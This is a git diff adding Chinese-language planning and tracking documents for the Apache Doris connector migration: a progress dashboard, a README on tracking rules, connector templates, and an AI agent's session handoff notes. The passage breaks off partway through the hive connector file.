+ +--- + +## 📅 最后一次 handoff + +- **日期 / 时间**:2026-05-24(同日两次更新) +- **本 session 主导者**:Claude Opus 4.7(1M context) +- **本 session 主题**:建立项目跟踪机制(完整版) +- **预估 context 使用**:~70%(进入"警觉"区,已停止接新任务) + +--- + +## ✅ 本 session 完成项 + +### 1. 决策闭环(前半段) +- ✅ Master plan §5 — 12 个项目决策点(D1-D12)全部按推荐确认 +- ✅ SPI RFC §16.2 — 6 个未决问题(U1-U6)全部决议(U4 改批量化) + +### 2. 跟踪机制建立(后半段,全部完成) +- ✅ `plan-doc/README.md` — 跟踪机制使用指南 + 文档索引 +- ✅ `plan-doc/PROGRESS.md` — 全局仪表盘(阶段进度、连接器看板、活跃 task、风险监控、session 状态) +- ✅ `plan-doc/AGENT-PLAYBOOK.md` — Agent 协作规范(context 预算、subagent 使用、handoff 触发、强制纪律、anti-patterns) +- ✅ `plan-doc/HANDOFF.md` — 本文件(滚动) +- ✅ `plan-doc/decisions-log.md` — 18 条 ADR(D-001..D-018) +- ✅ `plan-doc/deviations-log.md` — 空模板(DV-NNN 待用) +- ✅ `plan-doc/risks.md` — 14 个风险条目(R-001..R-014),含状态矩阵 +- ✅ `plan-doc/tasks/_template.md` — 阶段任务模板 +- ✅ `plan-doc/tasks/P0-spi-foundation.md` — P0 全部 27 个子任务清单 +- ✅ `plan-doc/connectors/_template.md` — 连接器跟踪模板 +- ✅ `plan-doc/connectors/{jdbc,es,trino-connector,hudi,maxcompute,paimon,iceberg,hive}.md` — 8 个连接器跟踪文件 +- ✅ `plan-doc/00-connector-migration-master-plan.md` 顶部加入跟踪体系入口链接 + +总计 **17 个文件**,220K,覆盖项目战略 + 进度 + 决策 + 风险 + 任务 + 连接器 + agent 协作 6 个维度。 + +--- + +## 🚧 本 session 进行中 / 未完成 + +**无**。本 session 工作完整收尾,跟踪机制已就位且自洽。 + +--- + +## 📝 关键认知 / 临时发现 + +(沿用上一版 HANDOFF 的认知,本次 session 未产生新代码层面发现) + +1. **`fe-connector/` 反向边界当前是干净的**(0 处禁用 import)—— grep 守门脚本只需维护现状即可。 +2. **`PluginDrivenExternalCatalog.gsonPostProcess` 已实现 ES/JDBC 兼容范本**(line 274-297)—— 后续连接器迁移直接复制该模式。 +3. **`PhysicalPlanTranslator.visitPhysicalFileScan` line 734-790 是 7-way switch 的单点收口** —— P1 首要清理目标。 +4. **`ConnectorTransactionHandle` 是 24 行空 marker 接口** —— `ConnectorTransaction` 计划继承它,不破坏现有引用。 +5. **`ConnectorPartitionInfo` 已存在** —— RFC E10 复用并扩展 3 个 long 字段(向后兼容构造器)。 +6. **`SPI_READY_TYPES` 白名单当前只含 `jdbc`, `es`** —— 后续连接器加入这个 ImmutableSet 即可生效。 +7. **`fe-connector-hms` 是共享库不是插件** —— 无 `META-INF/services/...ConnectorProvider`,被 hive / hudi / iceberg-HMS / paimon-HMS 依赖。 + +### 本 session 新增认知 +8. **跟踪机制的"决策 vs 偏差"区分是必须**:先前混在一起会让审查者无法判断"事前想清楚 vs 事后被现实纠正"。 +9. **`AGENT-PLAYBOOK` §2.1 的 context 预算分级**对当前 session 已生效——我自己在 ~70% 时停止接新任务。后续 session 应严格执行。 +10. **未来 agent 切 session 时的强制开场流程在 README §7.3 和 PLAYBOOK §4.5** —— **不读 HANDOFF 直接问"上次到哪了"是失败模式**。 + +--- + +## 🎯 下一个 session 第一件事 + +**两种路径,由 user 决定:** + +### Track A(推荐):开 P0 编码 + +第一件事: +``` +1. Read plan-doc/PROGRESS.md + plan-doc/HANDOFF.md +2. Read plan-doc/tasks/P0-spi-foundation.md(找批 0 第一个 task = P0-T03) +3. Read plan-doc/01-spi-extensions-rfc.md §6(E3 MetaInvalidator 设计) +4. 实现: + - 新建 fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorMetaInvalidator.java + - 修改 ConnectorContext.java 加 getMetaInvalidator() default 方法 +5. 编译:mvn -pl fe/fe-connector/fe-connector-spi compile +6. 完成后: + - 更新 tasks/P0-spi-foundation.md 中 P0-T03 状态为 ✅ + - 更新 PROGRESS.md §三和§四 + - 写新 HANDOFF.md +``` + +### Track B:建 git commit 沉淀本次工作 + +第一件事: +``` +1. cd /Users/morningman/workspace/git/wt-fs-spi +2. git status +3. git add plan-doc/ +4. git commit -m "[plan-doc] establish project tracking system with decision/deviation/risk logs" +5. 然后进入 Track A +``` + +**强烈推荐 Track B → Track A**:本次 session 创建了 17 个文档但都没提交;先 commit 沉淀,否则一旦本地文件意外丢失,所有跟踪机制要重做。 + +--- + +## ⚠️ 开放问题 / 风险提示 + +1. **跟踪机制本身从未被实际"使用"过**——所有文件都是预期模板,实际产生 deviation / 周维护时是否好用还要看。后续 session 第一次 append decision-log 或 deviation-log 时如果发现模板缺字段,按 DV 流程改 README §3。 +2. **`tools/check-connector-imports.sh` 守门脚本仍未实现**(RFC §15.4 + tasks/P0 P0-T21)—— P0 末必须完成。 +3. **`maven enforcer` 接入方式未敲定**——技术决策,留 P0 实施时定。 +4. **本 session 大量决策(D-001..D-018)尚未进入 git history** —— 见 Track B 推荐。 +5. **本跟踪机制没有 PMC review**——单人推进风险。建议在开 P0 编码前至少让一位 reviewer 看一遍 README + AGENT-PLAYBOOK。 + +--- + +## 📂 当前 plan-doc/ 目录全景 + +``` +plan-doc/ (220K, 17 文件) +├── 00-connector-migration-master-plan.md ← 战略 +├── 01-spi-extensions-rfc.md ← SPI 详细设计 +├── README.md ← 跟踪机制指南 +├── PROGRESS.md ← 全局仪表盘 ★ +├── AGENT-PLAYBOOK.md ← Agent 协作规范 ★ +├── HANDOFF.md ← 本文件(滚动) +├── decisions-log.md ← 18 条决策 +├── deviations-log.md ← 0 条偏差(空) +├── risks.md ← 14 个风险 +├── tasks/ +│ ├── _template.md +│ └── P0-spi-foundation.md ← 27 个子任务 +└── connectors/ + ├── _template.md + ├── jdbc.md ← 95% (P1 清理残留) + ├── es.md ← 100% ✅ + ├── trino-connector.md ← 30% (P2) + ├── hudi.md ← 20% (P3) + ├── maxcompute.md ← 25% (P4) + ├── paimon.md ← 20% (P5) + ├── iceberg.md ← 5% (P6) + └── hive.md ← 10% (P7) +``` + +--- + +## 🧠 给下一个 agent 的 meta 建议 + +- 本项目所有"事实陈述"(代码行数、文件位置、import 引用关系)基于 2026-05-24 这天的 `catalog-spi-2` 分支状态。如 session 跨多天且分支有更新,先 `git log --oneline catalog-spi-2 -10` 确认 base。 +- 用户偏好简洁、第一性原理、不绕弯。直接给推荐方案,等他说"这里改一下"再调整。**不要列 6 个选项让他选**——除非真的有 trade-off。 +- 用户经常在工作中途插入新需求(本次 session 加了 "context 管理" 要求)——用 PLAYBOOK §2.2 的"主动报告 context 占用"应对,不要默默吞掉。 +- 用户已确认 18 个决策(D-001..D-018),**不要重新打开**这些讨论,除非有强证据原决策不可行(此时走 DV 流程)。 +- 本次 session 的"建立跟踪机制"是一次性投资。后续 session 不要 re-design,**只用、不改**——除非走 DV 流程明确改进。 +- **必读 AGENT-PLAYBOOK 全文**再开始动手——特别是 §6 anti-patterns。 diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md new file mode 100644 index 00000000000000..a7d6e410a7b8f0 --- /dev/null +++ b/plan-doc/PROGRESS.md @@ -0,0 +1,128 @@ +# 📊 项目进度仪表盘 + +> 最后更新:**2026-05-24** | 当前阶段:**P0 SPI 缺口补齐** | 项目总进度:**5%** +> [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) + +--- + +## 一、阶段进度(P0–P8) + +| 阶段 | 范围 | 估时 | 进度 | 状态 | 任务文档 | +|---|---|---|---|---|---| +| **P0** | SPI 缺口补齐 | 2 周 | ▰▱▱▱▱▱▱▱▱▱ 10% | 🚧 进行中(2026-05-24 启动) | [tasks/P0](./tasks/P0-spi-foundation.md) | +| P1 | scan-node 收口 + 重复清理 | 1 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动(被 P0 阻塞)| — | +| P2 | trino-connector 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| P3 | hudi 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| P4 | maxcompute 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| P5 | paimon 迁移 | 3 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| P6 | iceberg 迁移 | 5 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| P7 | hive (+HMS) 迁移 | 6 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| P8 | 收尾清理 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | + +**全局进度:5%**(25 周计划中处于第 1 周) + +--- + +## 二、连接器迁移看板 + +> 维度:"SPI 设计" = RFC 中该连接器涉及的 SPI 是否定稿;"实现" = fe-connector 模块中代码完成度;"SPI_READY" = 是否已加入 `CatalogFactory.SPI_READY_TYPES`;"删除旧代码" = fe-core/datasource// 是否清空;"反向 instanceof" = nereids/planner 等热区中 `instanceof XExternal*` 是否清理。 + +| 连接器 | SPI 设计 | 实现完成度 | SPI_READY | 删除旧代码 | 反向 instanceof | 状态 | 详细 | +|---|---|---|---|---|---|---|---| +| **jdbc** | ✅ | ✅ 100% | ✅ | 🟡 (13 个旧 client,P1 删) | n/a | **95%** | [详情](./connectors/jdbc.md) | +| **es** | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/es.md) | +| trino-connector | 🟡 (P0 待完成) | 🟨 70% | ❌ | ❌ | 0/2 | **30%** | [详情](./connectors/trino-connector.md) | +| hudi | 🟡 | 🟨 50% | ❌ | ❌ | 0/0(寄生 hive) | **20%** | [详情](./connectors/hudi.md) | +| maxcompute | 🟡 | 🟨 60% | ❌ | ❌ | 0/12 | **25%** | [详情](./connectors/maxcompute.md) | +| paimon | 🟡 | 🟨 50% | ❌ | ❌ | 0/10 | **20%** | [详情](./connectors/paimon.md) | +| iceberg | 🟡 | 🟥 10% | ❌ | ❌ | 0/19 | **5%** | [详情](./connectors/iceberg.md) | +| hive (+hms) | 🟡 | 🟥 20% | ❌ | ❌ | 0/31 | **10%** | [详情](./connectors/hive.md) | + +--- + +## 三、当前活跃 task + +> 状态非 ✅ 的项,按阶段聚合。详细见各阶段 task 文件。 + +### P0 — SPI 缺口补齐 +| ID | Task | Owner | 状态 | 启动 | 备注 | +|---|---|---|---|---|---| +| P0-T01 | RFC §16.2 决策点闭环 | @me | ✅ | 2026-05-24 | 全部 18 条决策已敲定 | +| P0-T02 | 项目跟踪机制建立 | @me | 🚧 | 2026-05-24 | 本仪表盘 / README / decisions-log 等 | +| P0-T03 | E3 实现:`ConnectorMetaInvalidator` 接口 | — | ⏳ | — | 批 0 / spi 包 | +| P0-T04 | E4 实现:`ConnectorTransaction` 替换占位 | — | ⏳ | — | 批 0 / handle 包 | +| P0-T05 | E5 实现:`ConnectorMvccSnapshot` 类型 | — | ⏳ | — | 批 0 / mvcc 包 | +| P0-T06 | `ConnectorContext.getMetaInvalidator()` default | — | ⏳ | — | 批 0 | +| P0-T07 | `DefaultConnectorContext` impl + fe-core invalidator | — | ⏳ | — | 批 0 | +| P0-T08 | `PluginDrivenTransactionManager` 通用化 | — | ⏳ | — | 批 0 | +| P0-T09 | E1 实现:DDL request POJO + converter | — | ⏳ | — | 批 1 | +| P0-T10 | E10 实现:partition 列举 SPI | — | ⏳ | — | 批 1 | +| P0-T11 | CI grep 守门 + maven enforcer | — | ⏳ | — | 批 1 | +| P0-T12 | FakeConnectorPlugin + 回归测试 | — | ⏳ | — | 批 1 | + +完整 P0 任务清单:[tasks/P0-spi-foundation.md](./tasks/P0-spi-foundation.md) + +--- + +## 四、最近 14 天动态 + +> 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 + +- **2026-05-24** ✅ 项目跟踪机制建立(README、PROGRESS、decisions-log、deviations-log、risks、tasks/、connectors/、AGENT-PLAYBOOK、HANDOFF) +- **2026-05-24** ✅ SPI RFC §16.2 6 个未决问题(U1-U6)全部决议(D-013..D-018) +- **2026-05-24** ✅ SPI RFC v1 落地([01-spi-extensions-rfc.md](./01-spi-extensions-rfc.md)) +- **2026-05-24** ✅ Master Plan §5 12 个项目决策点(D1-D12)全部确认(D-001..D-012) +- **2026-05-24** ✅ Master Plan v1 落地([00-connector-migration-master-plan.md](./00-connector-migration-master-plan.md)) +- **2026-05-24** ✅ 初步代码侦察(177 个 fe-connector 文件、408 个 fe-core/datasource 文件、96 处反向 instanceof) + +--- + +## 五、风险监控(active risks) + +| ID | 风险 | 影响 | 当前状态 | 触发阶段 | Owner | +|---|---|---|---|---|---| +| R-001 | Image 反序列化兼容回归 | High | 🟢 监控中 | P2-P7 每个迁移 | @me | +| R-002 | Hive ACID 写路径数据不一致 | High | 🟡 待启动 | P7.3 | TBD | +| R-003 | Iceberg Procedure SPI 抽象失败 | Med | 🟢 监控中 | P6.4 | @me | +| R-004 | classloader 隔离打破 SDK 单例 | Med | 🟢 监控中 | P5/P6 | @me | +| R-005 | nereids 写命令深度耦合 | Med | 🟡 待 P6.3 评估 | P6.3 | TBD | +| R-006 | 通过 SPI 性能回归 | Low | ⏸ 未启动 | P0 末加 benchmark | TBD | +| R-007 | FE/BE 共享 jar 冲突 | Low | ⏸ 未启动 | P5/P6 | TBD | +| R-008 | 文档与流程脱节 | Low | 🟢 缓解中 | 全周期 | @me | + +完整列表见 [risks.md](./risks.md)(含 R-009..R-014 从 RFC §16.1 迁入的 Q1-Q6 类技术风险) + +--- + +## 六、决策与偏差快速跳转 + +| 类型 | 总数 | 最新条目 | 文档 | +|---|---|---|---| +| **决策**(D-NNN) | 18 | D-018(U6: ConnectorColumnStatistics 类型契约) | [decisions-log.md](./decisions-log.md) | +| **偏差**(DV-NNN) | 0 | — | [deviations-log.md](./deviations-log.md) | +| **风险**(R-NNN) | 14 | R-014(thrift sink 选择灵活性) | [risks.md](./risks.md) | + +--- + +## 七、Session 协作状态(Agent / Human) + +> 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 + +- **本 session 已完成**:跟踪机制建立(README / PROGRESS / 各类 log / 模板) +- **下一个 session 应做**:执行 P0 批 0 第一个 task(P0-T03 实现 `ConnectorMetaInvalidator`) +- **是否需要 handoff**:当前 session 工作正在收尾,预计本次 session 结束时填写 [HANDOFF.md](./HANDOFF.md) +- **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) + +--- + +## 八、维护规则速记 + +| 何时更新本文件 | 改什么 | +|---|---| +| 完成一个 task | §三表中删除 / 标 ✅;§四加一行 | +| 完成一个阶段 | §一进度条 + §三整体清理 + §四加里程碑 | +| 新增决策 | §四加一行 + §六计数 +1 | +| 发现偏差 | §四加一行 + §六计数 +1 | +| 每周一例行 | §四清过期、§五状态滚动、§七 session 状态 review | + +📖 详细规则见 [README.md §4 维护规则](./README.md) diff --git a/plan-doc/README.md b/plan-doc/README.md new file mode 100644 index 00000000000000..739910329b612d --- /dev/null +++ b/plan-doc/README.md @@ -0,0 +1,195 @@ +# Connector 迁移项目 — 文档与跟踪机制 + +> 本目录是 Doris connector 解耦迁移项目(fe-core/datasource → fe-connector/*)的**唯一权威文档源**。 +> 任何讨论、评审、PR 描述都应引用本目录文件,避免事实在群聊 / 邮件中丢失。 + +--- + +## 〇、入口(看了就懂) + +### 项目文档 + +| 我想做的事 | 看哪个文件 | +|---|---| +| **了解项目背景、整体设计、决策点** | [`00-connector-migration-master-plan.md`](./00-connector-migration-master-plan.md) | +| **了解 SPI 接口扩展细节(Java 签名)** | [`01-spi-extensions-rfc.md`](./01-spi-extensions-rfc.md) | +| **看现在做到哪一步了 / 谁在做什么** | [`PROGRESS.md`](./PROGRESS.md) ★ | +| **看具体阶段的任务清单** | [`tasks/Pn-*.md`](./tasks/) | +| **看具体连接器的迁移状态** | [`connectors/.md`](./connectors/) | +| **历史上做过哪些决策、为什么** | [`decisions-log.md`](./decisions-log.md) | +| **实施中发现原计划不可行的地方** | [`deviations-log.md`](./deviations-log.md) | +| **当前项目有哪些风险,谁在缓解** | [`risks.md`](./risks.md) | + +### Agent 协作(每次 session 开始必读) + +| 我是 LLM agent,我想... | 看哪个文件 | +|---|---| +| **了解如何管理 context、何时用 subagent、何时 handoff** | [`AGENT-PLAYBOOK.md`](./AGENT-PLAYBOOK.md) ★ | +| **接管上次 session 的工作** | [`HANDOFF.md`](./HANDOFF.md) ★ | + +--- + +## 一、目录结构 + +``` +plan-doc/ +├── 00-connector-migration-master-plan.md ← WHY/WHAT 总体设计(变化少) +├── 01-spi-extensions-rfc.md ← SPI 详细 RFC +├── README.md ← 本文件 +├── PROGRESS.md ← 全局仪表盘(人类入口必读) +├── AGENT-PLAYBOOK.md ← Agent 协作规范(context / subagent / handoff) +├── HANDOFF.md ← Session 间接力文档(滚动) +├── decisions-log.md ← ADR,append-only +├── deviations-log.md ← 实施偏差日志,append-only +├── risks.md ← 风险滚动状态 +├── tasks/ ← 按阶段切的任务清单 +│ ├── _template.md +│ └── P0-spi-foundation.md +└── connectors/ ← 按连接器切的迁移状态 + ├── _template.md + └── .md +``` + +--- + +## 二、文件职责矩阵 + +| 文件 | 内容性质 | 更新频率 | 主要读者 | 更新触发 | +|---|---|---|---|---| +| `00-master-plan.md` | 战略 / 总体设计 | 每月一次(重大架构变化)| 项目所有人 | 范围变更、阶段划分调整 | +| `01-spi-extensions-rfc.md` | 战术 / SPI 详细设计 | 每阶段一次 | connector 实现者 | SPI 接口签名变化 | +| `PROGRESS.md` | 状态快照 | **每周一次或重要变更后** | 所有人 | task 完成 / 阶段切换 | +| `AGENT-PLAYBOOK.md` | Agent 协作规范 | 不常变(v1 当前) | LLM agent | 规则失效时(DV 流程修改) | +| `HANDOFF.md` | Session 间状态接力 | **每次 session 结束**(覆盖) | 下次 agent | session 结束 | +| `tasks/Pn-*.md` | 阶段任务清单 | **每完成 task 后** | task owner | task 状态翻转 | +| `connectors/.md` | 连接器迁移历史 | 该连接器有动作时 | connector owner | playbook 步骤完成 | +| `decisions-log.md` | 决策记录(ADR)| **每新增决策后**(append) | review 者 / 后来人 | 任何新决策诞生 | +| `deviations-log.md` | 偏差日志 | **每发现偏差后**(append)| review 者 | 原计划被推翻 | +| `risks.md` | 风险登记册 | 每周状态滚动 | PM / SRE | 风险等级变化、新增风险 | + +--- + +## 三、关键概念区分(重要) + +### 3.1 决策 (Decision) vs 偏差 (Deviation) + +- **决策**:项目启动时或某阶段开始时**事前**确定的选择,进入 `decisions-log.md`。例:D-001 沿用 `SUPPORTS_PASSTHROUGH_QUERY`。 +- **偏差**:原计划中已经记录的设计 / 实现方案,在落地中发现不可行或不必要,**事后**记录调整,进入 `deviations-log.md`。例:DV-001 原计划 callProcedure 用 Map 入参,实际改 List。 + +混淆这两者会让人无法判断"这是事先想清楚了还是被现实打脸了"。 + +### 3.2 风险 (Risk) vs 问题 (Issue) + +- **风险**:可能发生的负面事件,进入 `risks.md`。状态滚动(监控中 / 缓解中 / 已闭环 / 已触发)。 +- **问题**:已经发生的事,应在对应 task 上记 blocker 备注;如果是阶段性的,可在 tasks/Pn 文件的"阶段日志"中记录。 + +### 3.3 Task ID 编号规则 + +``` +P0-T01 ← 阶段 P0 第 1 个任务 +P6.3-T05 ← 子阶段 P6.3 第 5 个任务 +``` + +ID 一旦分配**永不复用、永不重排**,即使任务被删除也保留 ID 占位(标 `[deleted]`)。 + +### 3.4 决策 / 偏差 / 风险编号规则 + +``` +D-001, D-002, ... 决策;旧 D1-D12, U1-U6 迁入时映射到 D-001..D-018 +DV-001, DV-002, ... 偏差 +R-001, R-002, ... 风险;旧 R1-R8, Q1-Q6 迁入时映射到 R-001..R-014 +``` + +--- + +## 四、维护规则(一定要遵守) + +### 4.1 每次完成一个 task + +1. 在对应 `tasks/Pn-*.md` 中把该 task 状态从 `🚧` 改为 `✅`,加完成日期 + PR 链接。 +2. 在该 task 文件的"**阶段日志**"末尾追加一行:`YYYY-MM-DD: 完成 Pn-Tnn — <一句话描述>`。 +3. 如果该 task 关联具体连接器,同步更新 `connectors/.md` 的"进度"段。 +4. 如果完成的是阶段的最后一个 task,更新 `PROGRESS.md`: + - 进度条 + - 阶段状态 + - 当前活跃 task 列表 + - "最近 7 天动态" + +### 4.2 每次产生新决策 + +1. 新决策**先写**到 `decisions-log.md` 顶部(时间倒序),分配 `D-NNN` 编号。 +2. 在 `PROGRESS.md` "最近 7 天动态" 中加一行链接。 +3. 如果决策修改了 RFC / master plan 的某节,**同步更新对应文档**,并在该节加 `(D-NNN 修订)`脚注。 + +### 4.3 每次发现设计偏差 + +1. **先在 `deviations-log.md` 顶部**记录:`DV-NNN`、原计划位置、为什么不可行、新方案、影响范围。 +2. 更新被影响的 RFC / master plan / task 文件。 +3. **不要**直接 silently 改 RFC——必须先记偏差,再改文档。 + +### 4.4 每周一例行维护 + +1. 滚动 `PROGRESS.md`:清"最近 7 天动态"中过期项,更新进度条。 +2. 扫一遍 `risks.md`:检查每个 active 风险的状态,更新缓解措施进展。 +3. 扫一遍 `tasks/` 中所有 in_progress 文件:是否有卡住的? + +### 4.5 每个 PR 必带 + +1. PR 描述里**第一行**写:`[Pn-Tnn] `。 +2. PR merge 后,task owner 立刻按 §4.1 流程更新 task 状态。 +3. 如果该 PR 引入了任何 SPI 接口签名变化,需要同步更新 `01-spi-extensions-rfc.md` 并在 PR 描述中说明。 + +--- + +## 五、防腐策略 + +为防止文档与代码 / 实际进度脱节,定期检查: + +| 项 | 频率 | 工具 / 方法 | +|---|---|---| +| `PROGRESS.md` 上次更新日期 < 7 天 | 每周一 | 手动 / 后续可写 `tools/check-tracking-freshness.sh` | +| `tasks/` 中无"in_progress 超过 14 天"任务 | 每周一 | 同上 | +| 所有 RFC `D-NNN` 引用在 `decisions-log.md` 都有对应条目 | merge 前 | 后续可写 grep 守门 | +| `PROGRESS.md` 中阶段百分比与 tasks/ 中真实完成率一致 | 每周一 | 简单脚本可计算 | + +--- + +## 六、不在范围 + +本跟踪机制**不**包含: + +- 代码评审(用 GitHub PR) +- 缺陷管理(用 GitHub Issues) +- CI 状态(用 GitHub Actions) +- 工时统计(不做) +- 个人 KPI 追踪(不做) + +文档只追踪"项目本身的设计与进度",不追踪人。 + +--- + +## 七、给后来者 + +### 7.1 第一次接触本项目(人类) + +1. 读 `00-master-plan.md` 第 §1 节、§3 节(10 分钟) +2. 看 `PROGRESS.md`(5 分钟)—— 知道现在在哪一步 +3. 如果你要做某个具体阶段,再读对应 `tasks/Pn-*.md` 和 RFC 中相关章节 + +### 7.2 来评审某个 PR(人类) + +1. 看 PR 描述中的 `[Pn-Tnn]` +2. 跳到 `tasks/Pn-*.md` 找该 task 的"备注"和"验收标准" +3. 评审完毕在 PR 中确认 task 完成 + +### 7.3 LLM agent 接手 session(AI) + +**强制顺序**(来自 [AGENT-PLAYBOOK §4.5](./AGENT-PLAYBOOK.md)): + +1. Read `PROGRESS.md` —— 全局状态 +2. Read `HANDOFF.md` —— 上次 session 留言 +3. 如 HANDOFF 标记当前 task,Read 对应 `tasks/Pn-*.md` 中该 task 块 +4. 用一句话复述确认:"上次完成了 X,下一步是 Y,对吗?" +5. 用户确认后开始 + +**永远不要**在没读 HANDOFF 的情况下问"我们上次做到哪了"。 diff --git a/plan-doc/connectors/_template.md b/plan-doc/connectors/_template.md new file mode 100644 index 00000000000000..ef7df9da7c49a8 --- /dev/null +++ b/plan-doc/connectors/_template.md @@ -0,0 +1,83 @@ +# Connector: `` + +> 复制本模板到 `connectors/.md` 创建新连接器跟踪文件。 +> 维护规则:每次该连接器有动作(playbook 步骤完成、PR 合入、SPI 实现更新)时同步更新。 + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | `` | +| **fe-connector 模块** | `fe/fe-connector/fe-connector-/` | +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource//` | +| **共享依赖** | `fe-connector-hms` / 无 / 其他 | +| **计划迁移阶段** | P | +| **当前状态** | ⏸ 未启动 / 🚧 进行中 / ✅ 完成 | +| **完成度** | 0% / 50% / 100% | +| **主 owner** | @xxx | + +--- + +## 迁移 Playbook 进度(13 步,来自 master plan §4) + +> 状态:✅ 完成 / 🚧 进行中 / ⏳ 未启动 / 🚫 不适用 + +| 步骤 | 描述 | 状态 | 备注 | +|---|---|---|---| +| 1 | 列出 fe-core 类,按终态分类 | ⏳ | | +| 2 | 列出 fe-connector 已有类,对照差距 | ⏳ | | +| 3 | 列出反向 instanceof / cast 调用点 | ⏳ | grep 结果数量 | +| 4 | 实现 ConnectorMetadata / ScanPlanProvider 缺失方法 | ⏳ | | +| 5 | 实现 ConnectorProvider.validateProperties + preCreateValidation | ⏳ | | +| 6 | META-INF/services 注册 | ⏳ | | +| 7 | CatalogFactory.SPI_READY_TYPES 加入 | ⏳ | | +| 8 | PluginDrivenExternalCatalog.gsonPostProcess 加迁移分支 | ⏳ | | +| 9 | ExternalCatalog.registerCompatibleSubtype 注册 | ⏳ | | +| 10 | 替换反向 instanceof(nereids/planner/...) | ⏳ | | +| 11 | PhysicalPlanTranslator 删该连接器分支 | ⏳ | | +| 12 | 写 / 跑回归测试 + image 兼容用例 | ⏳ | | +| 13 | 删除 fe-core 旧目录 + import 清理 | ⏳ | | + +--- + +## SPI 实现完成度(对照 RFC §2.1 扩展点) + +| 扩展点 | 是否需要 | 实现状态 | 备注 | +|---|---|---|---| +| E1 CreateTableRequest | | | | +| E2 Procedures | | | | +| E3 MetaInvalidator | | | | +| E4 Transactions | | | | +| E5 MvccSnapshot | | | | +| E6 VendedCredentials | | | | +| E7 SysTables | | | | +| E8 ColumnStatistics | | | | +| E9 Delete/Merge sink | | | | +| E10 listPartitions | | | | + +--- + +## 已知特殊性 / 风险 + +> 该连接器独有的难点。 + +- ... + +--- + +## 关联 + +- 阶段 task:[tasks/P](../tasks/P-xxx.md) +- 决策:D-NNN, ... +- 偏差:DV-NNN, ... +- 风险:R-NNN, ... +- 关键 PR:#NNN, ... + +--- + +## 进度日志(倒序) + +### YYYY-MM-DD +- 描述 diff --git a/plan-doc/connectors/es.md b/plan-doc/connectors/es.md new file mode 100644 index 00000000000000..563c69ef9eed86 --- /dev/null +++ b/plan-doc/connectors/es.md @@ -0,0 +1,68 @@ +# Connector: `es` + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | `es` | +| **fe-connector 模块** | `fe/fe-connector/fe-connector-es/` | +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/es/`(**目录已删除** ✅)| +| **共享依赖** | 无 | +| **计划迁移阶段** | 已完成(在 SPI 前置阶段) | +| **当前状态** | ✅ 100% 完成 | +| **完成度** | 100% | +| **主 owner** | @me | + +--- + +## 迁移 Playbook 进度 + +| 步骤 | 状态 | 备注 | +|---|---|---| +| 1-13 | ✅ | 全部 13 步完成 | + +--- + +## SPI 实现完成度 + +| 扩展点 | 是否需要 | 实现状态 | +|---|---|---| +| E1 CreateTableRequest | ❌ | n/a(ES 不支持 CREATE TABLE) | +| E2 Procedures | ❌ | n/a | +| E3 MetaInvalidator | ❌ | n/a | +| E4 Transactions | ❌ | n/a | +| E5 MvccSnapshot | ❌ | n/a | +| E6 VendedCredentials | ❌ | n/a | +| E7 SysTables | ❌ | n/a | +| E8 ColumnStatistics | ❌ | n/a | +| E9 Delete/Merge sink | ❌ | n/a | +| E10 listPartitions | ❌ | n/a | + +ES 不需要任何 P0 新增 SPI——它的所有功能都用现有 SPI 表达完毕。 + +--- + +## 已知特殊性 + +- ES 是**第一个**真正打通 SPI 端到端的连接器,是后续迁移的**参考样板**。 +- ES 用 `FORMAT_ES_HTTP` 作为 `TFileFormatType` 兜底;不是文件扫描但寄生于 `FileQueryScanNode`。 +- ES 有独特的 `terminate_after` 优化(`PluginDrivenScanNode.createScanRangeLocations` line 422-428):limit 全推下时附加给 ES 减少 scroll。这是连接器特定逻辑残留在 fe-core 的小缺口,等价的"scan-level 自定义参数"未来可考虑通过 `populateScanLevelParams` 完整下放。 +- 20 个 java 源文件 + 7 个测试文件,完整 REST 客户端 / DSL 构建 / 映射工具自含。 + +--- + +## 关联 + +- 阶段 task:N/A(已完成) +- 决策:D-001(沿用 PASSTHROUGH_QUERY)、D-002(PluginDrivenScanNode extends FileQueryScanNode 由 ES/JDBC 验证可行) +- 偏差:(暂无) +- 风险:(暂无) + +--- + +## 进度日志 + +### 2026-05-24 +- 跟踪文件建立。状态:100% 完成,作为后续连接器迁移的参考样板。 diff --git a/plan-doc/connectors/hive.md b/plan-doc/connectors/hive.md new file mode 100644 index 00000000000000..b3fbd2c5a173ae --- /dev/null +++ b/plan-doc/connectors/hive.md @@ -0,0 +1,95 @@ +# Connector: `hive` (含 `hms` 共享库) + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | `hms`(CATALOG_TYPE_PROP=hms)| +| **fe-connector 模块** | `fe/fe-connector/fe-connector-hive/` + `fe/fe-connector/fe-connector-hms/`(共享库)| +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/hive/` | +| **共享依赖** | 自身 `fe-connector-hms`;被 